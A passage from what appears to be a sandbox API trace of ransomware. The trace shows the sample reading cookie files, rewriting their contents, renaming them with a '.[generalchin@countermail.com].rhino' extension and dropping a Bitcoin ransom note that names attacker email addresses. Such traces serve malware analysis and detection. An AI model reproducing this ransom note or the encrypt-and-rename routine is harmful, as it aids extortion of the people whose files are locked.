SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.610] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.612] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.612] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x53, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x53, lpOverlapped=0x0) returned 1 [0088.612] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.613] GetLastError () returned 0x0 [0088.613] SetLastError (dwErrCode=0x0) [0088.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x53) returned 0x708d18 [0088.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00d0 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01d8 [0088.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00d0 | out: hHeap=0x6d0000) returned 1 [0088.613] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0088.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x173) returned 0x23b0360 [0088.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.615] WriteFile (in: hFile=0x104, lpBuffer=0x23b0360*, nNumberOfBytesToWrite=0x173, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0360*, lpNumberOfBytesWritten=0x2cfa04*=0x173, lpOverlapped=0x0) returned 1 [0088.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0360 | out: hHeap=0x6d0000) returned 1 [0088.615] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x173, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.615] CloseHandle (hObject=0x104) returned 1 [0088.616] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.616] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0360 [0088.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.616] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.617] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0360 | out: hHeap=0x6d0000) returned 1 [0088.617] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0088.617] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.617] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.618] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.618] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.620] CloseHandle (hObject=0x104) returned 1 [0088.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.659] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x227 [0088.659] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x347, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.659] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.660] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.661] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.662] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x227, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x227, lpOverlapped=0x0) returned 1 [0088.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.662] GetLastError () returned 0x0 [0088.662] SetLastError (dwErrCode=0x0) [0088.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x227) returned 0x23b0048 [0088.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0278 [0088.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0380 [0088.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0278 | out: hHeap=0x6d0000) returned 1 [0088.662] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b0278 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0508 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0278 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b05e8 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0508 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b0730 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05e8 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0918 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0730 | out: hHeap=0x6d0000) returned 1 [0088.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0088.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0918 | out: hHeap=0x6d0000) returned 1 [0088.664] WriteFile (in: hFile=0xec, lpBuffer=0x75ef78*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75ef78*, lpNumberOfBytesWritten=0x2cfa04*=0x347, lpOverlapped=0x0) returned 1 [0088.665] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.665] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x347, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.665] CloseHandle (hObject=0xec) returned 1 [0088.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0508 [0088.666] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.666] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0508 | out: hHeap=0x6d0000) returned 1 [0088.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0088.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.668] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.706] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xf1 [0088.706] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x211, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.706] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.706] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.708] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.711] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xf1, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xf1, lpOverlapped=0x0) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.711] GetLastError () returned 0x0 [0088.711] SetLastError (dwErrCode=0x0) [0088.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf1) returned 0x23b00e0 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01e0 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02e8 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e0 | out: hHeap=0x6d0000) returned 1 [0088.712] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01e0 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0470 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e0 | out: hHeap=0x6d0000) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x211) returned 0x23b05b8 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0470 | out: hHeap=0x6d0000) returned 1 [0088.713] WriteFile (in: hFile=0xec, lpBuffer=0x23b05b8*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b05b8*, lpNumberOfBytesWritten=0x2cfa04*=0x211, lpOverlapped=0x0) returned 1 [0088.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05b8 | out: hHeap=0x6d0000) returned 1 [0088.714] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x211, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.714] CloseHandle (hObject=0xec) returned 1 [0088.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.715] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0470 [0088.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.715] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 